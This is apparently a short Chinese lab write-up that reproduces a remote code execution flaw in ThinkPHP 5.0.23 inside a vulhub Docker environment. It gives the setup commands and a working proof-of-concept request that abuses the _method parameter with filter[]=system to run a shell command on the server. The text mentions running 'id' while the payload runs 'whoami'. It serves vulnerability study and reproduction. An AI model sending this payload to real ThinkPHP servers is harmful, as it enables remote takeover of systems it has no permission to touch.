ThinkPHP是国内使用极为广泛的PHP开发框架。在其 5.0(<5.0.24) 版本中,框架在获取请求方法时,对其进行了错误的处理,使得攻击者可以调用 Request 类的任意方法,从而通过特定的利用链导致 RCE 漏洞。
环境设置
进入对应目录
cd /home/vulhub/thinkphp/5.0.23-rce/
也可以一步步来
输入以下命令:(ThinkPHP版本:5.0.23)
docker-compose up -d
如果有问题可以试试重启稻壳
systemctl restart docker
访问http://your-ip:8080
,将看到 ThinkPHP 的默认页面。
POC
发送数据包并修改URL后执行命令id
:
http://IP:8080/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
复现成功
burpsuite抓包 也可以